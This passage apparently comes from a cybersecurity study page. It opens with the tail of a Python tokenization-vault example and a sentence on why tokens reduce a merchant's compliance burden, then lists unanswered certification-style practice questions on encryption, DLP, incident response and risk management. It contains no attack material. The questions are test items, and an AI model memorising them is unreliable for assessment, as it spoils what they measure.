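    print("admin detokenizes:", vault.detokenize(token, "vault_admin"))
```

The merchant's benefit over encryption follows from the design: systems that store only tokens never hold the PAN or a key that could recover it, so the compliance burden concentrates on the vault.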
Which encryption type uses a public key to encrypt and a private key to decrypt?
Data Loss Prevention (DLP) tools are primarily designed to:
What is the difference between Confidentiality and Privacy?
Which phase of the data lifecycle involves securely removing data when it is no longer needed?
In Incident Response, what is the primary goal of the 'Containment' phase?
A company purchases cyber insurance. Which risk management strategy is this?
What is the difference between an 'Event' and an 'Incident' in cybersecurity?
After a ransomware attack is resolved, the team holds a 'Lessons Learned' meeting. What is the primary output of this meeting?